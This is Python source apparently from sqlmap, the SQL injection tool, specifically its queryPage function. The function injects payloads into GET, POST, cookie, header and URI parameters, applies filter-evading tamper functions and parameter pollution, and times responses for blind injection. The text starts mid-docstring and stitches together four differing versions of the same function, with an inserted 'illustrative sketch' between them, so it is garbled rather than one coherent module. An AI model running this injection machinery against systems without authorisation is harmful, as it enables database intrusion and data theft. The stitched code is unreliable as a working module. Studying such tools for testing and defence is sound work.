    string match check ('--string' command line parameter)
    """

    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    host = None
    page = None
    pageLength = None
    uri = None
    code = None
    urlEncodePost = None

    if not place:
        place = kb.injection.place or PLACE.GET

    raise404 = place != PLACE.URI if raise404 is None else raise404

    value = agent.adjustLateValues(value)
    payload = agent.extractPayload(value)
    threadData = getCurrentThreadData()

    if conf.httpHeaders:
        headers = dict(conf.httpHeaders)
        contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())
        urlEncodePost = contentType and "urlencoded" in contentType or contentType is None

        if (kb.postHint or conf.skipUrlEncode) and urlEncodePost:
            urlEncodePost = False
            conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
            contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
            conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                payload = function(payload=payload, headers=auxHeaders)

                if not isinstance(payload, basestring):
                    errMsg = "tamper function '%s' returns " % function.func_name
                    errMsg += "invalid payload type ('%s')" % type(payload)
                    raise SqlmapValueException(errMsg)

            value = agent.replacePayload(value, payload)

        logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))

        if place == PLACE.CUSTOM_POST:
            if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                # payloads in SOAP/XML should have chars > and < replaced
                # with their HTML encoded counterparts
                payload = payload.replace('>', "&gt;").replace('<', "&lt;")
            elif kb.postHint == POST_HINT.JSON:
                if payload.startswith('"') and payload.endswith('"'):
                    payload = json.dumps(payload[1:-1])
                else:
                    payload = json.dumps(payload)[1:-1]

            value = agent.replacePayload(value, payload)
        else:
            # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
            if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST,) and urlEncodePost:
                payload = urlencode(payload, '%', False, place != PLACE.URI)
                value = agent.replacePayload(value, payload)

    if conf.hpp:
        if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
            warnMsg = "HTTP parameter pollution should work only against "
            warnMsg += "ASP(.NET) targets"
            singleTimeWarnMessage(warnMsg)

        if place in (PLACE.GET, PLACE.POST):
            _ = re.escape(PAYLOAD_DELIMITER)
            match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)

            if match:
                payload = match.group("value")

                for splitter in (urlencode(' '), ' '):
                    if splitter in payload:
                        prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*"))
                        parts = payload.split(splitter)
                        parts[0] = "%s%s" % (parts[0], suffix)
                        parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1])

                        for i in xrange(1, len(parts) - 1):
                            parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix)

                        payload = "".join(parts)

                for splitter in (urlencode(','), ','):
                    payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")))

                value = agent.replacePayload(value, payload)
        else:
            warnMsg = "HTTP parameter pollution works only with regular "
            warnMsg += "GET and POST parameters"
            singleTimeWarnMessage(warnMsg)

    if place:
        value = agent.removePayloadDelimiters(value)

    if PLACE.GET in conf.parameters:
        get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value

    if PLACE.POST in conf.parameters:
        post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value

    if PLACE.CUSTOM_POST in conf.parameters:
        post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value
        post = post.replace(ASTERISK_MARKER, '*') if post else post

    if PLACE.COOKIE in conf.parameters:
        cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value

    if PLACE.USER_AGENT in conf.parameters:
        ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value

    if PLACE.REFERER in conf.parameters:
        referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value

    if PLACE.HOST in conf.parameters:
        host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value

    if PLACE.URI in conf.parameters:
        uri = conf.url if place != PLACE.URI or not value else value
    else:
        uri = conf.url

    if value and place == PLACE.CUSTOM_HEADER:
        if not auxHeaders:
            auxHeaders = {}

        auxHeaders[value.split(',')[0]] = value.split(',', 1)[1]

    if conf.rParam:
        def _randomizeParameter(paramString, randomParameter):
            retVal = paramString
            match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)

            if match:
                origValue = match.group("value")
                retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)

            return retVal

        for randomParameter in conf.rParam:
            for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
                if item in conf.parameters:
                    if item == PLACE.GET and get:
                        get = _randomizeParameter(get, randomParameter)
                    elif item == PLACE.POST and post:
                        post = _randomizeParameter(post, randomParameter)
                    elif item == PLACE.COOKIE and cookie:
                        cookie = _randomizeParameter(cookie, randomParameter)

    if conf.evalCode:
        delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER
        variables = {}
        originals = {}

        for item in filter(None, (get, post)):
            for part in item.split(delimiter):
                if '=' in part:
                    name, value = part.split('=', 1)
                    value = urldecode(value, convall=True, plusspace=(item == post and kb.postSpaceToPlus))
                    evaluateCode("%s=%s" % (name, repr(value)), variables)

        if cookie:
            for part in cookie.split(conf.cDel or DEFAULT_COOKIE_DELIMITER):
                if '=' in part:
                    name, value = part.split('=', 1)
                    value = urldecode(value, convall=True)
                    evaluateCode("%s=%s" % (name, repr(value)), variables)

        originals.update(variables)
        evaluateCode(conf.evalCode, variables)

        for name, value in variables.items():
            if name != "__builtins__" and originals.get(name, "") != value:
                if isinstance(value, (basestring, int)):
                    value = unicode(value)

                    if re.search(r"\b%s=" % name, (get or "")):
                        get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get)
                    elif re.search(r"\b%s=" % name, (post or "")):
                        post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post)
                    elif re.search(r"\b%s=" % name, (cookie or "")):
                        cookie = re.sub("((\A|\W)%s=)([^%s]+)" % (name, conf.cDel or DEFAULT_COOKIE_DELIMITER), "\g<1>%s" % value, cookie)
                    elif post is not None:
                        post += "%s%s=%s" % (delimiter, name, value)
                    else:
                        get += "%s%s=%s" % (delimiter, name, value)

    if not conf.skipUrlEncode:
        get = urlencode(get, limit=True)

    if post is not None:
        if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
            post = getattr(post, UNENCODED_ORIGINAL_VALUE)
        elif urlEncodePost:
            post = urlencode(post, spaceplus=kb.postSpaceToPlus)

    if timeBasedCompare:
        if len(kb.responseTimes) < MIN_TIME_RESPONSES:
            clearConsoleLine()

            if conf.tor:
                warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
                warnMsg += "time-based injections because of its high latency time"
                singleTimeWarnMessage(warnMsg)

            warnMsg = "time-based comparison needs larger statistical "
            warnMsg += "model. Making a few dummy requests, please wait.."
            singleTimeWarnMessage(warnMsg)

            while len(kb.responseTimes) < MIN_TIME_RESPONSES:
                Connect.queryPage(content=True)
        elif not kb.testMode:
            warnMsg = "it is very important not to stress the network adapter's "
            warnMsg += "bandwidth during usage of time-based payloads"
            singleTimeWarnMessage(warnMsg)

        if not kb.laggingChecked:
            kb.laggingChecked = True

            deviation = stdev(kb.responseTimes)

            if deviation > WARN_TIME_STDEV:
                kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

                warnMsg = "there is considerable lagging "
                warnMsg += "in connection response(s). Please use as high "
                warnMsg += "value for option '--time-sec' as possible (e.g. "
                warnMsg += "10 or more)"
                logger.critical(warnMsg)

    if conf.safUrl and conf.saFreq > 0:
        kb.queryCounter += 1
        if kb.queryCounter % conf.saFreq == 0:
            Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)

    start = time.time()

    if kb.nullConnection and not content and not response and not timeBasedCompare:
        noteResponseTime = False

        pushValue(kb.pageCompress)
        kb.pageCompress = False

        if kb.nullConnection == NULLCONNECTION.HEAD:
            method = HTTPMETHOD.HEAD
        elif kb.nullConnection == NULLCONNECTION.RANGE:
            if not auxHeaders:
                auxHeaders = {}

            auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1"

        _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ))

        if headers:
            if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers:
                pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH])
            elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers:
                pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:])

        kb.pageCompress = popValue()

    if not pageLength:
        try:
            page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
        except MemoryError:
            page, headers, code = None, None, None
            warnMsg = "site returned insanely large response"
            if kb.testMode:
                warnMsg += " in testing phase. This is a common "
                warnMsg += "behavior in custom WAF/IDS/IPS solutions"
            singleTimeWarnMessage(warnMsg)

    if conf.secondOrder:
        page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    kb.originalCode = kb.originalCode or code

    if kb.testMode:
        kb.testQueryCount += 1

    if timeBasedCompare:
        return wasLastResponseDelayed()
    elif noteResponseTime:
        kb.responseTimes.append(threadData.lastQueryDuration)

    if not response and removeReflection:
        page = removeReflectiveValues(page, payload)

    kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
    kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None

    if content or response:
        return page, headers

    if getRatioValue:
        return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
    else:
        return comparison(page, headers, code, getRatioValue, pageLength)
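# --- Illustrative sketch (not part of sqlmap): the lagging check above flags a
# noisy connection via the sample standard deviation of the collected response
# times (sqlmap's stdev() and WARN_TIME_STDEV live in lib/core/common.py and
# lib/core/settings.py respectively; the threshold below is assumed):
def stdevSketch(values):
    avg = sum(values) / float(len(values))
    return (sum((value - avg) ** 2 for value in values) / float(len(values) - 1)) ** 0.5

responseTimesSketch = [0.41, 0.39, 0.44, 1.90, 0.40]

if stdevSketch(responseTimesSketch) > 0.5:  # hypothetical WARN_TIME_STDEV
    print("considerable lagging; consider a higher '--time-sec' value")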
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
    """
    This method calls a function to get the target URL page content
    and returns its page MD5 hash or a boolean value in case of
    string match check ('--string' command line parameter)
    """

    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    host = None
    page = None
    pageLength = None
    uri = None
    code = None

    if not place:
        place = kb.injection.place or PLACE.GET

    if not auxHeaders:
        auxHeaders = {}

    raise404 = place != PLACE.URI if raise404 is None else raise404
    method = method or conf.method

    value = agent.adjustLateValues(value)
    payload = agent.extractPayload(value)
    threadData = getCurrentThreadData()

    if conf.httpHeaders:
        headers = OrderedDict(conf.httpHeaders)
        contentType = max(headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())

        if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode:
            kb.postUrlEncode = False
            conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType]
            contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE)
            conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType))

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                try:
                    payload = function(payload=payload, headers=auxHeaders)
                except Exception, ex:
                    errMsg = "error occurred while running tamper "
                    errMsg += "function '%s' ('%s')" % (function.func_name, ex)
                    raise SqlmapGenericException(errMsg)

                if not isinstance(payload, basestring):
                    errMsg = "tamper function '%s' returns " % function.func_name
                    errMsg += "invalid payload type ('%s')" % type(payload)
                    raise SqlmapValueException(errMsg)

            value = agent.replacePayload(value, payload)

        logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))

        if place == PLACE.CUSTOM_POST and kb.postHint:
            if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                # payloads in SOAP/XML should have chars > and < replaced
                # with their HTML encoded counterparts
                payload = payload.replace('>', "&gt;").replace('<', "&lt;")
            elif kb.postHint == POST_HINT.JSON:
                if payload.startswith('"') and payload.endswith('"'):
                    payload = json.dumps(payload[1:-1])
                else:
                    payload = json.dumps(payload)[1:-1]
            elif kb.postHint == POST_HINT.JSON_LIKE:
                payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')
                if payload.startswith('"') and payload.endswith('"'):
                    payload = json.dumps(payload[1:-1])
                else:
                    payload = json.dumps(payload)[1:-1]
                payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"')

            value = agent.replacePayload(value, payload)
        else:
            # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded
            if place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and kb.postUrlEncode:
                payload = urlencode(payload, '%', False, place != PLACE.URI)  # spaceplus is handled down below
                value = agent.replacePayload(value, payload)

    if conf.hpp:
        if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
            warnMsg = "HTTP parameter pollution should work only against "
            warnMsg += "ASP(.NET) targets"
            singleTimeWarnMessage(warnMsg)

        if place in (PLACE.GET, PLACE.POST):
            _ = re.escape(PAYLOAD_DELIMITER)
            match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)

            if match:
                payload = match.group("value")

                for splitter in (urlencode(' '), ' '):
                    if splitter in payload:
                        prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*"))
                        parts = payload.split(splitter)
                        parts[0] = "%s%s" % (parts[0], suffix)
                        parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1])

                        for i in xrange(1, len(parts) - 1):
                            parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix)

                        payload = "".join(parts)

                for splitter in (urlencode(','), ','):
                    payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")))

                value = agent.replacePayload(value, payload)
        else:
            warnMsg = "HTTP parameter pollution works only with regular "
            warnMsg += "GET and POST parameters"
            singleTimeWarnMessage(warnMsg)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None):
    """
    This method calls a function to get the target URL page content
    and returns its page MD5 hash or a boolean value in case of
    string match check ('--string' command line parameter)
    """

    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    page = None
    pageLength = None
    uri = None

    raise404 = place != PLACE.URI if raise404 is None else raise404

    if not place:
        place = kb.injection.place

    payload = agent.extractPayload(value)
    threadData = getCurrentThreadData()

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                payload = function(payload)

            value = agent.replacePayload(value, payload)

        logger.log(9, payload)

        if place == PLACE.COOKIE and conf.cookieUrlencode:
            value = agent.removePayloadDelimiters(value)
            value = urlEncodeCookieValues(value)
        elif place:
            if place in (PLACE.GET, PLACE.POST):
                # payloads in GET and/or POST need to be urlencoded
                # thoroughly without safe chars (especially & and =)
                # addendum: as we support url encoding in tampering
                # functions therefore we need to use % as a safe char
                payload = urlencode(payload, "%", False, True)
                value = agent.replacePayload(value, payload)

            value = agent.removePayloadDelimiters(value)

    if conf.checkPayload:
        checkPayload(value)

    if PLACE.GET in conf.parameters:
        get = urlencode(conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value, limit=True)

    if PLACE.POST in conf.parameters:
        post = urlencode(conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value)

    if PLACE.COOKIE in conf.parameters:
        cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value

    if PLACE.UA in conf.parameters:
        ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value

    if PLACE.REFERER in conf.parameters:
        referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value

    if PLACE.URI in conf.parameters:
        uri = conf.url if place != PLACE.URI or not value else value
    else:
        uri = conf.url

    if timeBasedCompare:
        if len(kb.responseTimes) < MIN_TIME_RESPONSES:
            clearConsoleLine()

            warnMsg = "time-based comparison needs larger statistical "
            warnMsg += "model. Making a few dummy requests, please wait.."
            logger.warn(warnMsg)

            while len(kb.responseTimes) < MIN_TIME_RESPONSES:
                Connect.queryPage(content=True)

    if conf.safUrl and conf.saFreq > 0:
        kb.queryCounter += 1
        if kb.queryCounter % conf.saFreq == 0:
            Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer)

    start = time.time()

    if kb.nullConnection and not content and not response and not timeBasedCompare:
        if kb.nullConnection == NULLCONNECTION.HEAD:
            method = HTTPMETHOD.HEAD
        elif kb.nullConnection == NULLCONNECTION.RANGE:
            if not auxHeaders:
                auxHeaders = {}

            auxHeaders[HTTPHEADER.RANGE] = "bytes=-1"

        _, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404)

        if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers:
            pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH])
        elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers:
            pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:])

    if not pageLength:
        page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    if kb.testMode:
        kb.testQueryCount += 1

    if conf.cj:
        conf.cj.clear()

    if timeBasedCompare:
        return wasLastRequestDelayed()
    elif noteResponseTime:
        kb.responseTimes.append(threadData.lastQueryDuration)

    if content or response:
        return page, headers

    page = removeReflectiveValues(page, payload)

    if getRatioValue:
        return comparison(page, getRatioValue=False, pageLength=pageLength), comparison(page, getRatioValue=True, pageLength=pageLength)
    elif pageLength or page:
        return comparison(page, getRatioValue, pageLength)
    else:
        return False
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
    """
    This method calls a function to get the target URL page content
    and returns its page MD5 hash or a boolean value in case of
    string match check ('--string' command line parameter)
    """

    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    host = None
    page = None
    pageLength = None
    uri = None
    code = None
    skipUrlEncode = conf.skipUrlEncode

    if not place:
        place = kb.injection.place or PLACE.GET

    raise404 = place != PLACE.URI if raise404 is None else raise404

    value = agent.adjustLateValues(value)
    payload = agent.extractPayload(value)
    threadData = getCurrentThreadData()

    if skipUrlEncode is None and conf.httpHeaders:
        headers = dict(conf.httpHeaders)
        _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())

        if _ and "urlencoded" not in _:
            skipUrlEncode = True

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                payload, auxHeaders = function(payload=payload, headers=auxHeaders)

            value = agent.replacePayload(value, payload)

        logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))

        if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST):
            # payloads in GET and/or POST need to be urlencoded
            # thoroughly without safe chars (especially & and =)
            # addendum: as we support url encoding in tampering
            # functions therefore we need to use % as a safe char
            if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)):
                payload = urlencode(payload, '%', False, True) if place not in (PLACE.POST, PLACE.CUSTOM_POST) and not skipUrlEncode else payload
                value = agent.replacePayload(value, payload)
        elif place == PLACE.SOAP:
            # payloads in SOAP should have chars > and < replaced
            # with their HTML encoded counterparts
            payload = payload.replace('>', "&gt;").replace('<', "&lt;")
            value = agent.replacePayload(value, payload)

    if place:
        value = agent.removePayloadDelimiters(value)

    if place == PLACE.COOKIE and conf.cookieUrlencode:
        value = urlEncodeCookieValues(value)

    if conf.checkPayload:
        checkPayload(value)

    if PLACE.GET in conf.parameters:
        get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value

    if PLACE.POST in conf.parameters:
        post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value

    if PLACE.CUSTOM_POST in conf.parameters:
        post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value

    if PLACE.SOAP in conf.parameters:
        post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value

    if PLACE.COOKIE in conf.parameters:
        cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value

    if PLACE.USER_AGENT in conf.parameters:
        ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value

    if PLACE.REFERER in conf.parameters:
        referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value

    if PLACE.HOST in conf.parameters:
        host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value

    if PLACE.URI in conf.parameters:
        uri = conf.url if place != PLACE.URI or not value else value
    else:
        uri = conf.url

    if conf.rParam:
        def _randomizeParameter(paramString, randomParameter):
            retVal = paramString
            match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)

            if match:
                origValue = match.group("value")
                retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)

            return retVal

        for randomParameter in conf.rParam:
            for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
                if item in conf.parameters:
                    if item == PLACE.GET and get:
                        get = _randomizeParameter(get, randomParameter)
                    elif item == PLACE.POST and post:
                        post = _randomizeParameter(post, randomParameter)
                    elif item == PLACE.COOKIE and cookie:
                        cookie = _randomizeParameter(cookie, randomParameter)

    if conf.evalCode:
        delimiter = conf.pDel or "&"
        variables = {}
        originals = {}

        for item in filter(None, (get, post)):
            for part in item.split(delimiter):
                if '=' in part:
                    name, value = part.split('=', 1)
                    evaluateCode("%s=%s" % (name, repr(value)), variables)

        originals.update(variables)
        evaluateCode(conf.evalCode, variables)

        for name, value in variables.items():
            if name != "__builtins__" and originals.get(name, "") != value:
                if isinstance(value, (basestring, int)):
                    value = unicode(value)

                    if '%s=' % name in (get or ""):
                        get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get)
                    elif '%s=' % name in (post or ""):
                        post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post)
                    elif post:
                        post += "%s%s=%s" % (delimiter, name, value)
                    else:
                        get += "%s%s=%s" % (delimiter, name, value)

    get = urlencode(get, limit=True)

    if post:
        if conf.skipUrlEncode is None:
            _ = (post or "").strip()

            if _.startswith("<") and _.endswith(">"):
                msg = "provided POST data looks "
                msg += "like it's in XML format. "
                msg += "Do you want to turn off URL encoding "
                msg += "which is usually causing problems "
                msg += "in this kind of situations? [Y/n]"
                skipUrlEncode = conf.skipUrlEncode = readInput(msg, default="Y").upper() != "N"

        if place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
            post = getattr(post, UNENCODED_ORIGINAL_VALUE)
        elif not skipUrlEncode and place not in (PLACE.SOAP,):
            post = urlencode(post)

    if timeBasedCompare:
        if len(kb.responseTimes) < MIN_TIME_RESPONSES:
            clearConsoleLine()

            if conf.tor:
                warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
                warnMsg += "time-based injections because of its high latency time"
                singleTimeWarnMessage(warnMsg)

            warnMsg = "time-based comparison needs larger statistical "
            warnMsg += "model. Making a few dummy requests, please wait.."
            singleTimeWarnMessage(warnMsg)

            while len(kb.responseTimes) < MIN_TIME_RESPONSES:
                Connect.queryPage(content=True)

            deviation = stdev(kb.responseTimes)

            if deviation > WARN_TIME_STDEV:
                kb.adjustTimeDelay = False

                warnMsg = "there is considerable lagging "
                warnMsg += "in connection response(s). Please use as high "
                warnMsg += "value for option '--time-sec' as possible (e.g. "
                warnMsg += "%d or more)" % (conf.timeSec * 2)
                logger.critical(warnMsg)
        elif not kb.testMode:
            warnMsg = "it is very important not to stress the network adapter's "
            warnMsg += "bandwidth during usage of time-based queries"
            singleTimeWarnMessage(warnMsg)

    if conf.safUrl and conf.saFreq > 0:
        kb.queryCounter += 1
        if kb.queryCounter % conf.saFreq == 0:
            Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)

    start = time.time()

    if kb.nullConnection and not content and not response and not timeBasedCompare:
        noteResponseTime = False

        if kb.nullConnection == NULLCONNECTION.HEAD:
            method = HTTPMETHOD.HEAD
        elif kb.nullConnection == NULLCONNECTION.RANGE:
            if not auxHeaders:
                auxHeaders = {}

            auxHeaders[HTTPHEADER.RANGE] = "bytes=-1"

        _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404)

        if headers:
            if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers:
                pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH])
            elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers:
                pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:])

    if not pageLength:
        page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)

    if conf.secondOrder:
        page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    kb.originalCode = kb.originalCode or code

    if kb.testMode:
        kb.testQueryCount += 1

    if timeBasedCompare:
        return wasLastRequestDelayed()
    elif noteResponseTime:
        kb.responseTimes.append(threadData.lastQueryDuration)

    if not response and removeReflection:
        page = removeReflectiveValues(page, payload)

    kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None
    kb.permissionFlag = re.search(r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None

    if content or response:
        return page, headers

    if getRatioValue:
        return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
    elif pageLength or page:
        return comparison(page, headers, code, getRatioValue, pageLength)
    else:
        return False
